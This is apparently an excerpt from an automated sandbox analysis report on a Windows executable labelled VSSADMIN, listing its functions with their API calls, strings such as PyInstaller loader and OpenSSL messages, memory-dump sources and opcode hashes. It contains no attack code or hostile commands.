                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                                                                      • Opcode ID: 48cdb819274e2c7c46086e4e80051458de93d23bd0bf89cf80ce51d91e6527a2
                                                                                                                                                                      • Instruction ID: be9c5c0f96c7cc321c3e6c029572b49928f14f46e004a2b7fa553ec906b9ddcb
                                                                                                                                                                      • Opcode Fuzzy Hash: 48cdb819274e2c7c46086e4e80051458de93d23bd0bf89cf80ce51d91e6527a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A416A32A0DF86C2E621DF15E48016AB6B5FB86BA4F584136DA8D87B95EF38E451C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77B70 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77BB1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77C25
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 3723044601-27947307
                                                                                                                                                                      • Opcode ID: 18245a40d80a6abdcbe2c7b8b5705f5c27a25298c5fa8019f4baef1b086b9209
                                                                                                                                                                      • Instruction ID: fe8a6ae26e3ecb7da4d6e6d34c4b00048e45e808c1be3054de304a6fa9a9bd34
                                                                                                                                                                      • Opcode Fuzzy Hash: 18245a40d80a6abdcbe2c7b8b5705f5c27a25298c5fa8019f4baef1b086b9209
                                                                                                                                                                      • Instruction Fuzzy Hash: 28216B31A0DF4796EA109F16E8800797AB1EB9AFA4B584137CA4EC3794EF7DE411C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C89294 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$p$p
                                                                                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                                                                                      • Opcode ID: 325dff1c9f2a8cc2ee0691d31cb87a7dd6083bcd652a905222ad4063330fef06
                                                                                                                                                                      • Instruction ID: be00e0ded957f39a9aad41b3018f731060724f15afe17f63d3cda6ad63f9dafa
                                                                                                                                                                      • Opcode Fuzzy Hash: 325dff1c9f2a8cc2ee0691d31cb87a7dd6083bcd652a905222ad4063330fef06
                                                                                                                                                                      • Instruction Fuzzy Hash: 02128461E0C94386FB649A15D1942F976B1FB82F74F884137E68A876C4DF3CE580EB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF60D2 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Fiber$Switch$CreateDelete
                                                                                                                                                                      • String ID: *$..\s\crypto\async\async.c
                                                                                                                                                                      • API String ID: 2050058302-1471988776
                                                                                                                                                                      • Opcode ID: c3e675d2ea6c9e8d84eec431eb5387898f63f209a2c3a50f4d01a6750cc88dd1
                                                                                                                                                                      • Instruction ID: 473647d19a1cb60abaa2933463ad81ab0d3a768b69592150b346492ff2e0cca4
                                                                                                                                                                      • Opcode Fuzzy Hash: c3e675d2ea6c9e8d84eec431eb5387898f63f209a2c3a50f4d01a6750cc88dd1
                                                                                                                                                                      • Instruction Fuzzy Hash: A2A19C76B09B0A81EB28DF15E4A06BD73A0EB44B84F044436CB8D47795EFBDE865E300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77C60 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                      • API String ID: 626452242-876015163
                                                                                                                                                                      • Opcode ID: f1753c96322f7a069f158a41c988c25d6713a1fcd3091b317cf7193edec7cc56
                                                                                                                                                                      • Instruction ID: fc7d11dce1dbd0b2b2a54d215174a0690c67da5781ec21c6da92c7c9be470ab7
                                                                                                                                                                      • Opcode Fuzzy Hash: f1753c96322f7a069f158a41c988c25d6713a1fcd3091b317cf7193edec7cc56
                                                                                                                                                                      • Instruction Fuzzy Hash: 29418F32A0DE46C2EA10DF15E48017A66B5FB96FA4F148137DA8D87BA5EF3CE451C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF2E4B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                      • String ID: OPENSSL_ia32cap$~$~$~$~
                                                                                                                                                                      • API String ID: 1431749950-1981414212
                                                                                                                                                                      • Opcode ID: cf480c52fdec152708fcec39c4b82c05f8550ca0c57a004c4734a86e6d7d47de
                                                                                                                                                                      • Instruction ID: 09e4fa7a6e1cfb4a179e05aa3f0ce0ebbf304b8081f6cc124100e2901241ff19
                                                                                                                                                                      • Opcode Fuzzy Hash: cf480c52fdec152708fcec39c4b82c05f8550ca0c57a004c4734a86e6d7d47de
                                                                                                                                                                      • Instruction Fuzzy Hash: 50414C26F0D65F85E7189B01A4B027873A0EB44790F884236DF6D47798EF2CE489E740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7CF18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CF9D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFAB
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFD5
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D01B
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D027
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: e8a6d54e8b280745c35d25ebb5fd2685d369d120d0d8ba32cf5e912c9d21884b
                                                                                                                                                                      • Instruction ID: 09a2d82cc85ce2739dfa8aa615a07dd884f482aea23070680b49e0b6b8009704
                                                                                                                                                                      • Opcode Fuzzy Hash: e8a6d54e8b280745c35d25ebb5fd2685d369d120d0d8ba32cf5e912c9d21884b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9731BE22A1EE4292EE519B06A88097523F4FF4AFB5F591536DD1ECB390EF3CE4468710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C764A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF614C767F1,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C764FF
                                                                                                                                                                        • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
                                                                                                                                                                      Strings
                                                                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF614C76513
                                                                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF614C764D6
                                                                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF614C7655A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                      • API String ID: 1662231829-3498232454
                                                                                                                                                                      • Opcode ID: a923076141be09bbc7de495348c051f7aeed93bc067fef176d064635955aa6b8
                                                                                                                                                                      • Instruction ID: 5329e482434e14f76dc2ae72854091868df9aaaebfc69258aac4c527fd38dbe9
                                                                                                                                                                      • Opcode Fuzzy Hash: a923076141be09bbc7de495348c051f7aeed93bc067fef176d064635955aa6b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 21318911B1CF8352FA609725E9D53BA6171AF9AFE1F844033DA4EC379AEE2DE5049700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF377E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: MASK:$default$nombstr$pkix$utf8only
                                                                                                                                                                      • API String ID: 3568877910-3483942737
                                                                                                                                                                      • Opcode ID: 0eb005829b5090700deec3fa77c1e89360f57b44948d3d3a333400b0d416245b
                                                                                                                                                                      • Instruction ID: 0b38e186f771a4c7610b39bf5a2dd740d048edcc5f21bdac5e7fe32f2c53e653
                                                                                                                                                                      • Opcode Fuzzy Hash: 0eb005829b5090700deec3fa77c1e89360f57b44948d3d3a333400b0d416245b
                                                                                                                                                                      • Instruction Fuzzy Hash: 42314D22B1C58D86EB598B1CF4A03BD77A0FB85750F844232EB5E43A99DE1CE495D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77A60 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77B20
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                      • API String ID: 3723044601-876015163
                                                                                                                                                                      • Opcode ID: af1bd620760198096b51ffca5ad4a35e36406969f2f33d318404d75935fb6e44
                                                                                                                                                                      • Instruction ID: 717150f64954594f96bb834c5812009267792c145566cc19a8c116bdf769a571
                                                                                                                                                                      • Opcode Fuzzy Hash: af1bd620760198096b51ffca5ad4a35e36406969f2f33d318404d75935fb6e44
                                                                                                                                                                      • Instruction Fuzzy Hash: 59215526B0CE4292EB50DB19F480069A3B1FB86BE8F584137DB5CC3B69EE2DE5518700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A650 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A65F
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A674
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A695
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6C2
